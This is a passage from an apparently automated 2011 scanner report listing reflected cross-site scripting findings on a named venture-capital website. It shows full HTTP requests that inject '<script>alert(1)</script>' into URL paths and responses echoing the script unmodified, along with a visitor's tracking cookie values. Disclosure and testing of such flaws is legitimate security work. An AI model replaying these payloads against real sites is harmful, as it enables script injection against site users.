User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.3.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A10%3A36; hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/us86457<script>alert(1)</script>637300b260d/seed</strong>
...[SNIP]...

1.14. http://www.sequoiacap.com/us/seed [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sequoiacap.com
Path:   /us/seed

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8cba<script>alert(1)</script>df5d137c8b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/seedd8cba<script>alert(1)</script>df5d137c8b1 HTTP/1.1
Host: www.sequoiacap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sequoiacap.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _chartbeat2=4btrmeuxxy3jdwvq.1318500669275; __utmx=10332215.; __utmxx=10332215.; __utma=10332215.1042707743.1318500669.1318500669.1318500669.1; __utmb=10332215.3.10.1318500669; __utmc=10332215; __utmz=10332215.1318500669.1.1.utmcsr=jivesoftware.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/investors; __utmv=10332215.autoregion%3Dus; hubspotdt=2011-10-13%2006%3A10%3A36; hubspotutk=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvd=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvw=1c36ebc87e634cd4929fa8b88b4fcea3; hubspotvm=1c36ebc87e634cd4929fa8b88b4fcea3; hsfirstvisit=http%3A%2F%2Fwww.sequoiacap.com%2F|http%3A%2F%2Fwww.jivesoftware.com%2Fabout%2Finvestors|2011-10-13%2006%3A10%3A36

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Status: 404
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
Set-Cookie: last_visited_region=2; path=/; expires=Thu, 13-Oct-2011 10:20:59 GMT
Cache-Control: no-cache
Server: nginx/0.7.67 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 7120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=
...[SNIP]...
<strong>/us/seedd8cba<script>alert(1)</script>df5d137c8b1</strong>
...[SNIP]...

Report generated by XSS.CX at Thu Oct 13 05:18:56 CDT 2011.